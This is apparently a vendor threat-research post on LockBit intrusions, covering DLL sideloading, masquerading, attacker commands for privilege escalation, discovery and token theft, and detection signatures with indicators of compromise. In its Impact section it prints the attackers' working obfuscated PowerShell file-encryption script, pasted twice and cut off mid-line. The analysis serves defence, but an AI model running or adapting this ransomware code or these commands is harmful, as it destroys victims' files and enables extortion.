Attackers deploying the LockBit ransomware have continually evolved their tactics, techniques, and procedures (TTPs) to evade detection and maximize its impact. Among their sophisticated arsenal, two techniques stand out for their effectiveness in concealing malicious activities: DLL sideloading and masquerading. This blog post delves into how attackers deploying LockBit leverage these methods to establish persistence and blend into legitimate system processes.

While this blog details methods used in LockBit ransomware attacks specifically, similar methods are used by attackers deploying other malicious payloads as well.

DLL sideloading: Exploiting trust for malicious gain

DLL sideloading is a stealthy attack technique where a legitimate application is tricked into loading a malicious Dynamic Link Library (DLL) instead of a legitimate one. This often occurs when a legitimate application attempts to load a DLL from an unsecured location or when the malicious DLL has the same name as a legitimate one but is placed in a directory that is searched earlier by the operating system.

LockBit has been observed using DLL sideloading to execute its payload. Here's a simplified breakdown of the process:

• Legitimate application as a loader: LockBit often bundles its malicious DLL with a legitimate, digitally signed application. This application, when executed, will attempt to load specific DLLs required for its functionality.
• Malicious DLL placement: The LockBit threat actors place their malicious DLL (often with a filename identical to a legitimate one) in a directory that is searched by the legitimate application before the legitimate DLL's actual location.
• Execution of malicious code: When the legitimate application is launched, it inadvertently loads and executes the malicious DLL, allowing the ransomware to initiate its encryption process or other nefarious activities under the guise of a trusted program.

This technique is particularly effective because it leverages the trust placed in legitimate applications, making it harder for traditional security solutions to differentiate between legitimate and malicious activity.

Masquerading: Blending in with legitimate processes

Masquerading refers to the technique of disguising malicious files or processes to appear as legitimate system files or applications. LockBit actors employ various masquerading tactics to avoid detection and maintain persistence on compromised systems.

Common masquerading techniques observed in LockBit attacks include:

• Renaming malicious files: Threat actors rename their ransomware executables or associated files to common system filenames (e.g., svchost.exe, explorer.exe, cmd.exe). This makes it difficult for users or even some security tools to distinguish them from legitimate system processes.
• Spoofing process names: LockBit may also attempt to manipulate process names to appear as legitimate services or applications running on the system. This can be achieved by injecting code into legitimate processes or by using specific APIs to alter process information.
• Using legitimate icons: To further enhance their disguise, LockBit samples have been found to use icons identical to those of legitimate Windows applications, making the malicious files appear less suspicious to a casual observer.
• Leveraging legitimate directories: Malicious files are often placed in directories commonly used by legitimate system files, such as C:\Windows\System32 or C:\ProgramData, further aiding in their camouflage.

In recent LockBit cases, attackers have been observed leveraging trusted applications alongside malicious DLLs (disguised with legitimate names) placed in the same directory. The technique relies on DLL side-loading, where the legitimate application inadvertently loads the malicious DLL. Examples include:

• Jarsigner.exe and jli.dll
  Both are parts of the Java platform. Jarsigner.exe naturally loads jli.dll. In this case, the attacker placed a legitimate jarsigner.exe and a malicious jli.dll (disguised with the correct name) in the same folder. When jarsigner.exe was executed, it loaded the malicious jli.dll, which acted as a loader for further payload execution.
   
• MpCmdRun.exe and mpclient.dll
  These components belong to Windows Defender. The attacker dropped a renamed MpCmdRun.exe (masquerading as <company_domain_name>.exe) along with a malicious mpclient.dll. When <company_domain_name>.exe was run, it loaded mpclient.dll, which contained the LockBit ransomware payload and began encrypting files.
   
• Clink_x86.exe and clink_dll_x86.dll
  These are part of the Clink tool, which integrates with cmd.exe to enhance command-line input using its own Readline-based features. The attacker dropped a renamed Clink_x86.exe (again masquerading as <company_domain_name>.exe) alongside a malicious clink_dll_x86.dll. Upon execution, <company_domain_name>.exe loaded the malicious DLL clink_dll_x86.dll, triggering the LockBit ransomware payload and starting file encryption.

In the following section, we’ll take a closer look into how the LockBit attacker is leveraging these techniques at various stages of the attack chain in recently seen attacks.

Attack chain: Initial access

A recent LockBit attack started with the attackers accessing machines using well-known remote desktop tools like MeshAgent, TeamViewer etc. Once an attacker gets access to remote machines, files are uploaded directly and executed.

Attack chain: Privilege escalation

NSSM: NSSM was used to run a remote access Trojan (RAT) as a service. NSSM is a utility that can launch any normal application as a Windows service. NSSM created a service for the RAT, which it named edge.exe.exe, and started the service. We also saw this RAT renamed as o.exe.

PsExec: PsExec was used to run cmd as a SYSTEM user using the “-s” parameter

PsExec64.exe -s -i cmd

Attack chain: Discovery

Net.exe, nltest.exe and query.exe were used to get details about domain users, domains group, and group permissions.

net user <username>

net group "domain computers" /do

nltest /domain_trusts

query user

Attack chain: Credential theft

TokenUtils.exe was used to steal tokens from all users and use those user tokens to launch any applications. In this case the attacker used the “NT AUTHORITY\SYSTEM” user token to run whoami and cmd.exe.

TokenUtils.exe ListTokens

TokenUtils.exe Execute -u “NT AUTHORITY\SYSTEM” -e whoami -c

TokenUtils.exe Execute -u “NT AUTHORITY\SYSTEM” -e cmd.exe -c 

Sd1.exe was also used to steal Kerberos tickets.

Sd1 <sub-domain>.<domain>.local <domain>.local krbtgt

Sd1 <sub-domain>.<domain>.local <domain> <domain>\<domain user>

Attack chain: Lateral movement

Group Policy was used to drop payloads on the machines and started executing files. Multiple files were dropped, including ransomware payloads (DLL and EXE), trusted files for DLL side loading, and PowerShell scripts.

Attack chain: Impact

The attackers also ran a malicious obfuscated PowerShell command to encrypt certain file types.

function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = '<RSAKeyValue><Modulus>lo233NH3Nv8AgTnugGImrUa13XuzHYyGSkgsgLrvz0y7MYix+U1eIYdF7BarhqKJXT1HZcijWzdz
2BzdZ1uvoSr9/41CMCAdkV1ISWuzdnQ2LLGdP1FaEvFls+p8P/hlBJd+D6WoFceRZ0QzRfj0qikaXT89KSZlJFrZg6Leo
jGvorzw7UVNwR+uXvBWKx+Ez4hNmxa2cLXyhmHA4QrUZ/xsG1u0j9Fk6Mqc4q6Vfb1x9NHR9W+caJbRs1RQENAkY2TqIRVjS5qIInB57gHxbuBp6WbBmtSJUJHnVqDu77U0BD80IYL3ggzAdazWoBarX81ZIRjZPb6+Ehmc/FL8+Q==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include *.pdf,*.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $_ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"}:Jïèfunction GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = '<RSAKeyValue><Modulus>lo233NH3Nv8AgTnugGImrUa13XuzHYyGSkgsgLrvz0y7MYix+U1eI
YdF7BarhqKJXT1HZcijWzdz2BzdZ1uvoSr9/41CMCAdkV1ISWuzdnQ2LLGdP1FaEvFls+p8P/hlBJd+D6WoFceRZ0QzRfj0qikaXT89KSZlJFrZg6Leo
jGvorzw7UVNwR+uXvBWKx+Ez4hNmxa2cLXyhmHA4QrUZ/xsG1u0j9Fk6Mqc4q6Vfb1x9NHR9W+caJbRs1RQENAkY2TqIRVjS5qIInB57gHxbuBp6WbBmtSJUJHnVqDu77U0BD80IYL3ggzAdazWoBarX81ZIRjZPb6+Ehmc/FL8+Q==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -

They also used DLL side loading for encryption, as mentioned above, and also dropped a few ransomware executable files and executed them directly.

While these TTPs were seen in a specific campaign targeting one victim, similar TTPs could easily be used in future attacks to deploy LockBit or other malicious payloads. 

The LockBit ransomware-as-a-service (RaaS) was run by Syrphid, a prominent cybercrime group. The U.S. Federal Bureau of Investigation (FBI) believes the group was responsible for extorting up to $500 million from victims since it first became active in 2019. However, Syrphid was disrupted in two law enforcement operations in 2024, including the group’s alleged ringleader, Dimitry Khoroshev (aka LockBitSupp) being indicted in the U.S. The builder for LockBit 3.0 was also subsequently leaked. This means that the ransomware could now be deployed by any threat actor as it is no longer under the control of its original developers.

Protection / Detection

Symantec EDR Incident AI Summary

Carbon Black EDR Alerts 

Below Alerts were generated on Carbon Black EDR for ransomware activity.

File-based protection

• Ransom.LockBit
• Heur.AdvML.B!100
• Heur.AdvML.C
• Trojan.Gen.9
• Trojan.Gen.MBT
• PUA.Gen.2
• Ransom.Blackmatter!gm1
• Trojan Horse
• Hacktool.Gen

Behavior-based protection

• SONAR.Ransomware!g3
• SONAR.Ransomware!g1
• SONAR.RansomGen!gen4
• SONAR.SuspLaunch!g559
• AGR.Terminate!g2

Adaptive-based protection

• ACM.Psxec-Lnch!g1        - PSEXEC Launch
• ACM.Psxsv-Net!g1          - PSEXEC running net commands
• ACM.Psxsv-Quser!g1      - PSEXEC running Quser commands
• ACM.Psxsv-Untrst!g1     - PSEXEC running untrusted process
• ACM.Untrst-RLsass!g1   - Untrusted process accessing LSASS

Network-based protection

• 32939 - Audit: TeamViewer Remote Access Activity
• 32940 - Audit: TeamViewer Remote Access Activity 2
• 12393  - Informational: MeshAgent Activity
• C&C WebPulse Categorization:
  • Categories:   Malicious Sources/Malnets(43)
  • Risk Level:    9 (Increased evidence of maliciousness)
    
     

Carbon Black protection

• Process nltest.exe was detected by the report "Discovery - NLTest Domain Trust Enumeration" in watchlist "Carbon Black Advanced Threats"
• Process powershell.exe was detected by the report "Discovery - AMSI - AntiVirus Fingerprinting" in watchlist "AMSI Threat Intelligence"
• A known virus was detected running
• A known virus was detected in file c:\users\test\appdata\roaming\mpclient.dll
• A known virus (Malware: Heur.AdvML.B!100) was detected in file c:\users\test\appdata\roaming\clink_dll_x86.dll
• The application explorer.exe dropped a known virus onto the device
• The application <domain>.exe renamed the extension of a user data file from doc to x2anylock. This technique is commonly associated with ransomware attacks

Indicators of compromise

File indicators

f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97 - Nssm.exe         

5ca8e1d001a2c3800afce017424ca471f3cba41f9089791074a9cb7591956430 - Tokenutils.exe 

0201a6dbe62d35b81d7cd7d7a731612458644b5e3b1abe414b0ea86d3266ab03 - sd1.exe            

1cd644b750884906b707419c8f40598c04f1402e4e93cbf4a33f3254846dc870 - <domain>.exe 

(Masqueraded MpCmdRun.exe)

edcf76600cd11ef7d6a5c319087041abc604e571239fe2dae4bca83688821a3a - mpclient.dll     

011b31d7e12a2403507a71deb33335d0e81f626d08ff68575a298edac45df4cb - <domain>access.exe 

(Masqueraded clink_x86.exe)

4147589aa11732438751c2ecf3079fb94fa478a01ac4f08d024fb55f7ffb52f3 - clink_dll_x86.dll            

10f1a789e515fdaf9c04e56b8a5330cfb1995825949e6db8c9eaba4ea9914c97 - jarsigner.exe   

086567b46fca2a27d404d9b61bdb482394e1591dc13f1302b813bb2ddf5e54cf - jli.dll   

6285d32a9491a0084da85a384a11e15e203badf67b1deed54155f02b7338b108. - nxc.exe             

785e5aaecd9430451f4b0bad637658e6afeea1e722b3d0dd674cb6a11f4ce286 - encth.exe, dwa.exe      

24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf - o.exe, edge.exe.exe     

Network indicators

msupdate[.]updatemicfosoft[.]com